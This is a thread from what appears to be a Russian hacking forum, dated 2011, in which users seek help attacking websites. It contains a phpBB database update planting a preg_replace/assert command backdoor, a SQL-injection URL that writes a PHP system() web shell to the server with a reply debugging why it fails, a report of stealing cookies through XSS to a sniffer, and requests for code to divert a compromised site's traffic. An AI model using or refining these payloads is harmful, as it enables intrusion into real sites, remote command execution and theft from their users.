
08.11.2011, 20:18
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от Strilo4ka
Copy() будет ограничена при safe_mode=on.
Лучше move_uploaded_file().
Да ладно?
Какие именно ограничения будут у copy() и не будут у move_uploaded_file() при сейфмоде не просветите?
|
|
|

08.11.2011, 20:31
|
|
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
С нами:
8348726
Репутация:
0
|
|
Тёща, отпиши в личку, напишу скрипт.
|
|
|

09.11.2011, 04:52
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
С нами:
8817310
Репутация:
108
|
|
Все привет, у меня чисто теоретический вопрос - нашел сегодня маленький сайтик - голый html, ни одного php-скрипта, 100%. Все что есть - это корневой каталог со страничками и папка /cgi-bin, в ней лежит чей-то шелл.
Вопрос - каким образом возможно залить его? В .htaccess никакой магии с интерпретацией html как php нет. Права на папку - drwxr-xr-x. Safe mode: OFF если что, система - линукс.
|
|
|

09.11.2011, 08:16
|
|
Познающий
Регистрация: 03.11.2011
Сообщений: 83
С нами:
7644566
Репутация:
11
|
|
=Zeus=,
через соседей, через саппорт хостинга
|
|
|

09.11.2011, 13:50
|
|
Участник форума
Регистрация: 03.10.2011
Сообщений: 208
С нами:
7689206
Репутация:
0
|
|
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;
сделал восстановление в бд, открыл профиль, на других такого никогда не было
что за ошибка такая ?
Сообщение от None
Parse error: syntax error, unexpected ']' in /xxx/xxx/includes/usercp_register.php(686) : regexp code on line 1
Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: ] in
|
|
|

09.11.2011, 14:40
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.
Запрос
Код:
http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20--
Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}
В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)
|
|
|

09.11.2011, 14:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от aydin-ka
Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.
Запрос
Код:
http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20--
Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}
В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)
phpinfo() это функция, а не константа, после имени идут скобки и " ; "
+ у тебя system, код не eval -ится, не сможешь вывести phpinfo, только системные команды
|
|
|

11.11.2011, 05:11
|
|
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами:
7719446
Репутация:
0
|
|
кто подскажет в чем проблемма,нашел xss активную попробывал впихуть скрипт в страницу,куки сразу пришли на снифер ,а вот код в странице не сохранился
xss в POST запросе
|
|
|

11.11.2011, 15:18
|
|
Новичок
Регистрация: 26.10.2011
Сообщений: 1
С нами:
7656086
Репутация:
0
|
|
Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все.
Заранее спасибо!
|
|
|

11.11.2011, 15:51
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от max9707
Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все.
Заранее спасибо!
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
это для iframe трафа
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
это что бы полностью твой сайт выводился
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|